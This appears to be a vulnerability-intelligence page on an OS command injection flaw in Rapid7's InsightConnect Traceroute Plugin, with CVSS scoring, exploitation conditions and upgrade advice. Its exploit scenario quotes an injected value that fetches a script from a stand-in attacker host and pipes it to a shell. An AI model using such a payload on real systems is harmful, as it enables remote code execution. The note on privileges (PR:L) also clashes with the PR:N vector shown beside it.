Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Command injection yields full impact, but invoking the plugin action realistically needs authenticated workflow access, so PR:L rather than the vendor's PR:N; network-reachable and low-complexity.
Primary rating from Vendor (rapid7).
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
8DescriptionNVD
OS Command Injection vulnerability in the traceroute action of Rapid7 InsightConnect Traceroute Plugin on Linux allows remote attackers to execute arbitrary OS commands via the host, port, max_ttl, count, or time_out request parameters due to insufficient input validation when constructing shell commands.
AnalysisAI
OS command injection in Rapid7's InsightConnect Traceroute Plugin (Linux, versions below 1.0.3) lets attackers inject arbitrary shell commands through the traceroute action's host, port, max_ttl, count, or time_out parameters, which are concatenated into a shell command without sufficient validation. Successful exploitation grants full command execution in the plugin container with the same impact on confidentiality, integrity, and availability. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires reaching the Traceroute Plugin's 'traceroute' action and controlling at least one of the host, port, max_ttl, count, or time_out request parameters; the plugin must be the vulnerable version (below 1.0.3) and running on Linux. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | Signals conflict and warrant scrutiny. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who can supply input to the Traceroute Plugin's action - for example by influencing a workflow field that feeds the 'host' parameter - submits a value such as '8.8.8.8; curl http://attacker/x | sh', which breaks out of the traceroute command and executes attacker-chosen commands in the plugin container. With AC:L the injection is straightforward and requires no special timing, though no public proof-of-concept is currently identified. |
| Remediation | Upgrade the InsightConnect Traceroute Plugin to version 1.0.3 or later, which contains the vendor fix (versions below 1.0.3 are vulnerable); the patched plugin is available from the Rapid7 extension page at https://extensions.rapid7.com/extension/traceroute. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Identify all systems running InsightConnect Traceroute Plugin versions below 1.0.3 and evaluate business impact; restrict network access to affected instances if possible. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-39161
GHSA-5854-xw4j-hrh6